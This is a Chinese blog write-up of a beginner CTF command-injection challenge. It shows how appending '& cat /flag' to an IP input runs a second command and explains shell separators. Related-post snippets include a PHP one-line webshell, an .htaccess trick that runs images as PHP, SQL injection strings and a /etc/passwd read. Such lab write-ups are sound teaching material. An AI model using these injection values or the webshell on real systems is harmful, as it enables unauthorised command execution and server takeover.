BUUCTF[ACTF2020新生赛]Exec

最新推荐文章于 2024-02-12 22:13:51 发布
最新推荐文章于 2024-02-12 22:13:51 发布
阅读量191 收藏
点赞数
分类专栏: CTF日记 文章标签: linux 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253622/article/details/116451508
版权

'

哦?命令执行漏洞利用

输入127.0.0.1

输入127.0.0.1 & cat /flag

emmm

说一下命令连接符的一些东西:

| 可以连接命令,且只会执行后面那条命令。

whoami | ping www.baidu.com
ping www.baidu.com | whoami
//两条命令都只会执行后面的

|| 只有前面的命令失败,才会执行后面的语句。

ping 127.0.0.1|| whoami //不执行whoami
ping xxx.|| whoami //执行whoami

&符号,不管前面的命令是成功还是失败,都会执行后面的命令。

ping 127.0.0.1& whoami //执行whoami
ping xxx.& whoami //执行whoami

所以我们选择&,当然 ; &效果是一样的。

&&符号就必须两条命令都为真才可以了

ping www.baidu.com -n 1&& whoami //执行whoami
ping www && whoami //不执行whoami

也可以这样 1&pwd

1 & cat /flag

也可以得到flag。

 

carefree798
关注
专栏目录
php exec ctf,从一道CTF题目谈PHP中的命令执行
weixin_42365490的博客
03-17 929
answer = "phpinfo"tmp1,tmp2 = '', ''forc inanswer:fori invalid:forj invalid:if(ord(i)^ord(j) == ord(c)):tmp1 += itmp2 += jbreakelse:continuebreakprint(tmp1,tmp2)其中valid是可用的字符,answer是我们需要构造的字符串。那么我们得到了...
BUUCTF[ACTF2020 新生]Exec
m0_47745762的博客
07-20 311
一、题目内容 对Linux命令的运用 二、解题步骤 ①从根目录查找flag (1)进入到靶机中 (2)用本机地址随便ping一下,看看能得到那些信息 (3)然后通过ls命令查找当前目录中有哪些文件 (4)查找后发现只有一个index.php的文件,我们查找一下里面是否含有flag的信息 (5)分析PHP代码,发现只有一个isset函数用于判断post传过来的数据是否被提交过来 (6) 我们发现当前目录中并没有关于flag的相关信息,那就可能是在根目录上,我们就挨个返..
BUUCTFExec,攻防世界之command_execution
金 帛的博客
03-16 2145
BUUCTFWP
exec/exec2命令执行
The code way of kinnisoy
10-29 646
题目给到源码 <?php $ip = isset($_POST['ip'])?$_POST['ip']:die(); if(!preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/i',$ip)){ die("ip 格式错误!"); } echo strlen($ip); if(strlen($ip)<7||strlen($ip)>21){ die("ip 长度错误!"); } // Determine OS and exec
BUUCTF[ACTF2020 新生]Exec1
2201_75556700的博客
01-21 459
4.发现有个flag文件,开始查看输入127.0.0.1|cat /flag,得到flag。3.利用管道符查看目录输入127.0.0.1|ls /或者1 | ls /查看目录。2.需要输入地址,尝试输入127.0.0.1,出现下面这个提示,看不懂,没关系。
buuctf [ACTF2020 新生]Exec1
最新发布
2302_80009791的博客
02-12 588
本题考查linux命令,越权查询。
BUUCTF-WEB
ccfly1012的博客
11-02 3867
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF-WriteUp
鱼的博客
02-01 737
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
BUUCTF-练习场-Web(5-8)
m0_62905745的博客
10-26 1527
SQL注入的解题大概步骤,以及爆表爆库查字段 绕过空格,替换字符的方法 命令执行漏洞
CTF [网络安全实验室] [脚本关]
热门推荐
weixin_45253622的博客
05-04 1万+
脚本关 1.key又又找不到了? emmmm 抓包放包key就出来了,和基础关的差不多。 2.快速口算 试着写下脚本: # -*- codeing = utf-8 -*- # @Time : 2021/5/4 10:46 # @Author : rexu # @File : 2sadd.py # @Software : PyCharm import requests,re s = requests.Session() url = "http://lab1.xseclab.com/xss
CTF [网络安全实验室] [基础关]
weixin_45253622的博客
05-04 2753
基础关 1.key在哪里? F12查看源码 2.再加密一次你就得到key了 加密之后的数据为xrlvf23xfqwsxsqf 我们在进行一次加密即可。 ROT13在线解码工具 3.猜猜这是经过了多少次加密? 加密后的字符串: Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVmpBeFYyS kVUbGhoTVVwVVZtcEJlRll5U2tWVWJHaG9UVlZ3VlZacVFtRlRNbEpJVm
BUUCTF[GXYCTF2019]BabySQli
weixin_45253622的博客
05-22 2179
SQL注入题型,在进行了自己的一些测试发现,用户名存在admin,我们F12看看源码: <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Do you know who am I?</title> <center> <form action="search.php" method="post" style="margin-top: 30..
BUUCTF [GXYCTF2019]BabyUpload
weixin_45253622的博客
05-26 2076
文件上传题型。 直接上传一句话木马 可以看出是黑名单过滤, 想到上传.htaccess文件,然后上传图片马,getshell。 key.htaccess文件内容如下: AddType application/x-httpd-php .jpg 抓包修改文件名上传成功。 接着上传图片马,发现; 猜测过滤<?;修改一句话如下: <script language = 'php'>eval($_REQUEST[a]); </script> 构造...
BUUCTF[网鼎杯2018]Fakebook
weixin_45253622的博客
05-22 719
我们注册一个账号看看: 注册成功如下: 这里需要注意,王小帥是可以点击的,url变为:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1我们试试sql注入; payload:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1' 没什么卵用,我们访问ro...
BUUCTF[GXYCTF2019]PingPingPing
weixin_45253622的博客
05-06 496
测试:?ip=127.0.0.1 测试:?ip=1&whoami 怀疑&被过滤,使用;替代: 发现可以,然后我们看看ls ?ip=1;ls 测试:/?ip=1;cat /flag 被过滤掉了,但是我们不知道什么
BUUCTF[MRCTF2020]你传你ma呢
weixin_45253622的博客
05-16 469
直接上传一句话木马发现: 将其改成jpg后缀,发现上传成功; 然后我们需要上传.htaccess文件将.jpg解析成 .php,文件内容如下: AddType application/x-httpd-php .jpg 上传失败: 我们试试抓包修改, 我们访问之前传的phpinfo.jpg发现: jpg图片已经成功被当场php解析。 成功上传,我们使用菜刀连接我们上传的一句话图片: 得到flag。 总结:上传php不被允许,绕过不可以,想到上传....
CTFshow [web1-5]
weixin_45253622的博客
05-09 366
web3 打开题目我们发现下列,看起来像是,文件包含,url是参数。 我们试试file协议: http://67a60ab5-5ad4-4e2f-834e-a6ace7f2bad2.challenge.ctf.show:8080/?url=file:///etc/passwd 出结果了,可以看出本题是php伪协议+文件包含+命令执行的题目。 我们输入 http://67a60ab5-5ad4-4e2f-834e-a6ace7f2bad2.challenge.ctf.show:8080
CTFshow [web 6-8]
weixin_45253622的博客
05-10 349
web5 代码审计题型。 where is flag? <?php error_reporting(0); //关闭错误报告 ?> <html lang="zh-CN"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-w...
BUUCTF[极客大挑战2019]BabySQL
weixin_45253622的博客
05-07 343
SQL注入题型 输入 admin' 123 报错;发现存在注入点和闭合方式。 我们查看字段; ?username=admin&password=123' order by 3 从报错提示可以看出,过滤掉了or字段,所以万能密码不能使用,我们试试嵌套绕过;?username=admin&password=123' oorrder by 3 ...
[ACTF2020 新生]Exec 1
09-19
关于 [ACTF2020 新生]Exec 1 的题目中的命令注入问题,根据引用的内容来分析,可以使用命令注入来解题。在这道题目中,使用命令注入的方式进行解题,首先通过测试命令 "ping 127.0.0.1" 来验证是否可以执行命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

carefree798

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值